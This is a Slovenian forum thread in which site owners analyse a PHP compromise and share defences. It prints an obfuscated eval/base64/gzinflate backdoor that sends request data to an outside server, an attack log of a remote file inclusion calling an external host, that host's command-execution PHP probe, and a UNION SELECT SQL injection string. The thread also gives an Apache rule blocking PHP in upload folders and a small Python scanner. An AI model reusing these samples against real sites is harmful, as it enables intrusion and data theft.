").$SSSSSSSSSSS.eval("return \"".SSSSSSS("88gvLrFSAAA=")."\";
").$SSSSS.$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0XXOSCwqTi2xUgAA")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJd/ZwDAp2DQEA")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0fVJzEsvTUxPtVIAAA==")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJ93H0cw91dHcFAA==")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("Cy1OLdJ1TE/NK7FSAAA=")."\";
").$_SERVER[SSSSSSS("8wgJCYgPDXYNind0d/ULAQA=")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("C0pNSy1KLbJSAAA=")."\";
").urlencode($_SERVER[SSSSSSS("8wgJCYgPDXYNig9ydXMNcg0CAA==")]).$SSSSSSSSSSS.eval("return \"".SSSSSSS("c87Py0tNLsnMz7NScM7JL04FAA==")."\";
").$SSSSSSSSSSS.$SSSSSSSSSSS)){@fclose($SSSSSSSS);
return false;
}$SSSSSSSSSSSS=0;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSSSS=SSSSSSS("AwA=");
while(!@feof($SSSSSSSS)){$SSSSSSSSSSSSS.=@fread($SSSSSSSS,2048*4);
if($SSSSSSSSSSSS===0){$SSSSSSSSSSSS=false;
if(substr($SSSSSSSSSSSSS,9,3)!=SSSSSSS("MzIwAAA=")){@fclose($SSSSSSSS);
return false;
}}if(!$SSSSSSSSSSSS){if(($SSSSSSSSSSSSSSS=strpos($SSSSSSSSSSSSS,eval("return \"".SSSSSSS("iymKyYsBYgA=")."\";
")))!==false){$SSSSSSSSSSSSSS.=substr($SSSSSSSSSSSSS,0,$SSSSSSSSSSSSSSS);
$SSSSSSS.=substr($SSSSSSSSSSSSS,$SSSSSSSSSSSSSSS+4);
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSS=true;
}else{$SSSSSSSSSSSSSS.=$SSSSSSSSSSSSS;
}}else{$SSSSSSS.=$SSSSSSSSSSSSS;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
}}@fclose($SSSSSSSS);
foreach(explode(eval("return \"".SSSSSSS("i8kDAA==")."\";
"),$SSSSSSSSSSSSSS)as $SSSSSSSSSSSSSSSS){if($SSSSSSSSSSSSSSSS=trim($SSSSSSSSSSSSSSSS)){if(count($SSSSSSSSSSSSSSS=explode(SSSSSSS("swIA"),$SSSSSSSSSSSSSSSS))==2){@header($SSSSSSSSSSSSSSSS,true);
if(substr(trim($SSSSSSSSSSSSSSS[1]),0,4)==SSSSSSS("K0mtKAEA")){$SSSSSSS=preg_replace(SSSSSSS("09fIKEpNqykuSta01YhWAgA=").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9WM0YvR14iOUwIA").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9XStI8x0s8sBgA="),SSSSSSS("izG0jTGyr0jLs40xjjECAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("07fJTS1JVMgoKSnQTS0szSyzVSpKTStKLc5Qio6zi9Wyt9PPLAYA"),SSSSSSS("s8lNLUlUyCgpKdBNLSzNLLNVKkpNK0otzlBSSM7PK0nNK7FVMjMwsFYIDfKxBQA=").urldecode($_SERVER[SSSSSSS("C3INDHUNDokPDfIEAA==")]).SSSSSSS("U7IDAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("009MLsnMz7NVKk5NLErO0CvIKFDSzywGAA=="),SSSSSSS("AwA="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("089NLcnIT7FVKsgvLlHSzywGAA=="),SSSSSSS("y00tychPsVVKTy1RAgA="),$SSSSSSS);
}}}}unset($SSSSSSSSSSSSSS);
return $SSSSSSS;
}return false;
}function SSSSSSS($v){return eval(base64_decode("cmV0dXJuIGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR2KSk7"));
}

?>

A je komu kaj več jasno? :)

vsi tisti stringi v stilu "089NLcnIT7FVKsgvLlHSzywGAA==" so ( zazipani in ) base64 encodani... te stringe potem eval-a tako da se ne da rečt kaj počne

base64 lahko odkodiraš npr tuki: http://www.motobit.com/util/base64-decoder-encoder.asp

npr zadnja funkcija s 7 "S" evala string "return gzinflate(base64_decode($v));"

skripto nadomesti z php skripto ki pošlje podatke človeka ki uleti na njo na tvoj email, ki je na nekem drugem serverju.

Odvisno od tega kako je server nastavljen ampak dostopal so lahko do vsega do čegar lahko tvoj PHP. Če lahko php dostopa do comand lina potem so lahko mel tud "simuliran" ssh dostop.

a se da kako konfigurirat httpd.conf s kakim regex-om, da se onemogoči php v vseh mapah, ki se začnejo z uploads/ ?

<Directory ~ "^/var/www/html(.*?)upload(.*?)">
    AddHandler default-handler php
</Directory>

tkole dela

Takole pa zgledajo logi:

==0d239948==============================
Request: domena.com 88.86.113.194 - - [18/Jan/2009:04:51:17 +0100] "GET /uploads/index.php?REQUEST=&REQUEST[option]=comconte
nt&REQUEST[Itemid]=1&GLOBALS=&mosConfigabsolutepath=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 403 402 "-" "Mozilla/4.61 en" t@qwWFu5wUAAATCwdiQAAAAH "-"

tole je pač en neuspeli poskus, ker site ni na mambo-joomli cms-ji

vsebina xml fajla je pa taka:

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

Komu se da v nedeljo sploh hekat strani ?!?!??!

Komu se da v nedeljo sploh hekat strani ?!?!??!

A misliš da sedijo zraven škatle in gledajo ali bo hack uspel LOL

Btw.
Če bi imeli malo bolj poskrbljeno za varnost se to ne bi dogajalo... Takšnih zahtevkov je na dan tisoče ... :)

Ah ja, skriptice? Po možnosti plačljive, ki jih kaki hacker zrihta, potem pa je noter polno evalov :). No sej tudi pri WP templatih se dogaja to ... :)

V nedeljo? Lahko bi bilo tudi kateri drug dan, dolgčas verjetno ...

janko: Hvala

dbMG: hvala za super post... res si car

hexer: jah... :) v nedeljo je bilo

Jah :D

Razkodiraj do konca pa vrži ven če ne rabiš te kode, samo verjetno je kak footer al pa kaj noter, nekaj kar bi te odvrnilo od tega da odstraniš. Je pa priporočljivo, da odstraniš .... :)

Je že vse iz backupov obnovljeno in luknja zavarovana(v vseh direktorijih kjer se lahko uploada, php ne dela. Upam da je to dovolj). Zlobna koda je odstranjena v celoti iz serevrja. Uploader že preverja mime/type, vendar se ga da prek browserja sfjekat, je treba server side preverjat - http://si2.php.net/finfo_file

Če bi kdo rad skeniral svoj server je tukaj python skripta.

import os, glob
stuff = os.popen("find /var/www/html/* -name '*.php'");
for item in stuff:
    f = open(os.path.normpath(item.strip())).read()
    if 'eval(' in f and 'base64_decode' in f and 'gzinflate' in f:
        print 'stuff! [' + item.strip() + ']'

LP

Evo še ena uganka, kaj točno doseže iz CONCAT()

450 and 1=2 union select
CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)
/*

Gre nekako za SQL injection samo mi ni jasno zakaj z znaki |_| ?

Skratka pojavlja se neko bot omrežje ki pošilja take querye, še kdo opazil? Namreč en page je dobil ob 5.00 -> 5.03 cca. 500 zahtevkov tega querya. Seveda vsak request je drugačen ip. Spet kak mali nadebudnež ...

HTTPUSERAGENT: ati2qs